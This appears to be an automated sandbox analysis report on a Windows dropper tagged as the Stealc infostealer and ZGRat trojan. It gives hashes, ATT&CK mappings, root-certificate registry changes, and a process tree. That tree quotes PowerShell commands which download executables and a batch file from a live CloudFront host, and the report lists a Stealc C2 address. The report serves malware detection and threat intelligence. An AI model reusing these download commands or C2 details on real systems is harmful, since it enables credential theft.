stealc | 56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d

Analysis

max time kernel
177s
max time network
181s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
06/05/2024, 22:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe
Size

49KB
MD5

d58a180c5d85448472b4e1007fae4b2a
SHA1

c07bf8ee2bb73efbf111c2dd753d70bbd84cdb54
SHA256

56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d
SHA512

78002ed8c7342d2298f74090afe83572f8373c8e34a3ea9bbc2fc8fed04b2cb3511cb1fd0dd194b1ac41ac0a77ab1cdaa184d34e25cf1b21e4f8990922be3367
SSDEEP

1536:XferrLkSRoe8C4UZsys0Dh1duFpkvFI+Plh:Xfi3k+oWDBDh1duFpjWlh

Score

10^/10

stealc zgrat discovery execution rat spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=443&c=1000

Extracted

Family

stealc

http://185.172.128.150

Attributes

url_path
/c698e1bc8a2f5e6d.php

Signatures

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral1/memory/2724-290-0x0000000000EE0000-0x0000000004714000-memory.dmp	family_zgrat_v1
behavioral1/memory/2724-291-0x000000001ED50000-0x000000001EE5A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2724-295-0x000000001E1C0000-0x000000001E1E4000-memory.dmp	family_zgrat_v1

Stealc
Stealc is an infostealer written in C++.
stealer stealc
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
17	2804	powershell.exe
18	2320	powershell.exe
19	2320	powershell.exe
20	1712	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
1492	i1.exe
1064	u15g.0.exe
656	u15g.1.exe

Loads dropped DLL 12 IoCs

pid	Process
1652	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe
2632	cmd.exe
1492	i1.exe
1492	i1.exe
1492	i1.exe
1492	i1.exe
1492	i1.exe
1492	i1.exe
1492	i1.exe
1492	i1.exe
1064	u15g.0.exe
1064	u15g.0.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2804	powershell.exe
2320	powershell.exe
1712	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u15g.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u15g.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u15g.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u15g.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u15g.0.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2804	powershell.exe
2320	powershell.exe
1712	powershell.exe
1064	u15g.0.exe
2724	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
2724	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
2724	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
2724	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
2724	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
1064	u15g.0.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	2724	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
656	u15g.1.exe
656	u15g.1.exe
656	u15g.1.exe
656	u15g.1.exe
656	u15g.1.exe
656	u15g.1.exe
656	u15g.1.exe

Suspicious use of SendNotifyMessage 7 IoCs

pid	Process
656	u15g.1.exe
656	u15g.1.exe
656	u15g.1.exe
656	u15g.1.exe
656	u15g.1.exe
656	u15g.1.exe
656	u15g.1.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 1652 wrote to memory of 2632	1652	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe	28
PID 1652 wrote to memory of 2632	1652	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe	28
PID 1652 wrote to memory of 2632	1652	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe	28
PID 1652 wrote to memory of 2632	1652	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe	28
PID 2632 wrote to memory of 2804	2632	cmd.exe	30
PID 2632 wrote to memory of 2804	2632	cmd.exe	30
PID 2632 wrote to memory of 2804	2632	cmd.exe	30
PID 2632 wrote to memory of 2804	2632	cmd.exe	30
PID 2632 wrote to memory of 2320	2632	cmd.exe	32
PID 2632 wrote to memory of 2320	2632	cmd.exe	32
PID 2632 wrote to memory of 2320	2632	cmd.exe	32
PID 2632 wrote to memory of 2320	2632	cmd.exe	32
PID 2632 wrote to memory of 1492	2632	cmd.exe	33
PID 2632 wrote to memory of 1492	2632	cmd.exe	33
PID 2632 wrote to memory of 1492	2632	cmd.exe	33
PID 2632 wrote to memory of 1492	2632	cmd.exe	33
PID 2632 wrote to memory of 1712	2632	cmd.exe	34
PID 2632 wrote to memory of 1712	2632	cmd.exe	34
PID 2632 wrote to memory of 1712	2632	cmd.exe	34
PID 2632 wrote to memory of 1712	2632	cmd.exe	34
PID 2632 wrote to memory of 1460	2632	cmd.exe	35
PID 2632 wrote to memory of 1460	2632	cmd.exe	35
PID 2632 wrote to memory of 1460	2632	cmd.exe	35
PID 2632 wrote to memory of 1460	2632	cmd.exe	35
PID 1492 wrote to memory of 1064	1492	i1.exe	37
PID 1492 wrote to memory of 1064	1492	i1.exe	37
PID 1492 wrote to memory of 1064	1492	i1.exe	37
PID 1492 wrote to memory of 1064	1492	i1.exe	37
PID 1492 wrote to memory of 656	1492	i1.exe	38
PID 1492 wrote to memory of 656	1492	i1.exe	38
PID 1492 wrote to memory of 656	1492	i1.exe	38
PID 1492 wrote to memory of 656	1492	i1.exe	38
PID 656 wrote to memory of 2724	656	u15g.1.exe	40
PID 656 wrote to memory of 2724	656	u15g.1.exe	40
PID 656 wrote to memory of 2724	656	u15g.1.exe	40
PID 656 wrote to memory of 2724	656	u15g.1.exe	40

C:\Users\Admin\AppData\Local\Temp\56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe
"C:\Users\Admin\AppData\Local\Temp\56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe"
1⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1652
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nso1F93.tmp\app.bat"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2632
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2804
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2320
- - C:\Users\Admin\AppData\Local\Temp\i1.exe
    i1.exe /SUB=2838 /str=one
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1492
  - - C:\Users\Admin\AppData\Local\Temp\u15g.0.exe
      "C:\Users\Admin\AppData\Local\Temp\u15g.0.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:1064
  - - C:\Users\Admin\AppData\Local\Temp\u15g.1.exe
      "C:\Users\Admin\AppData\Local\Temp\u15g.1.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:656
    - - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2724
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=443&c=1000', 'i2.bat')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K i2.bat
    3⤵
    PID:1460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
69f15a2d1016131b084043db39b8fd01

SHA1
cae9b4b2f5919580554accc3102db99763aaac5b

SHA256
49bc4019bf03106fb0f9282313f0953547fbb50a9aca19ccefde33755e396b18

SHA512
69035ece4dbc781ac3430a1f7b9cab1e1991c33f60c29d72093d7b7df04bd1fc8e0fdf8c62a55a331a4a00d10157900ef1e7d0589c4382da4a61d3d0c10572cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\049b7335d372bd07248452d0b58e37cfb8420ac5b148b226adcb19ae95655a7b\246a683e2a1e43d8b0e9654105f2e047.tmp

Filesize
1KB

MD5
e0727423afa58c97c5dd4663624cff79

SHA1
f99ccff8e1bb91342ee26e105293356179f756c2

SHA256
4e895aeb367c9e6c0acccc756cb1a9ac9e18f877ed771b3aabc55d99192d5846

SHA512
ba3a6a677404bfbee657cbaaccf289230a2a1b2a2c46dc5c789259c6d776e20283beb5ea8c6c5c65f324456311ba5e4fbffc813cd4c2dc590bfe92568872f360

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar242D.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\i1.exe

Filesize
423KB

MD5
5b82c33ae65525d14793909ec833f42f

SHA1
37d51bb30d2351213f492fb6622a627230f6b4b3

SHA256
6f5fa0aa57d4db23a970f02f8880ce42550cbe5b6f9122122547c7324d3ef2ef

SHA512
7822af9ec5be6d0be42726d67372de8295e4b9b1b2e069d43552b7d1f698b8a6dd72393294fe99709d7fc9a30389b1cf735fbb41a7c7ee1b4a5a58b25b7d7099

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
2KB

MD5
1ad172662864682c07efb407971605da

SHA1
dd34db113a8fed37987c6719c8494b34922257a5

SHA256
60864b2e74d589994c58ad8af7ef53f5e8b59f2189bbeea2346ed4bcad95846d

SHA512
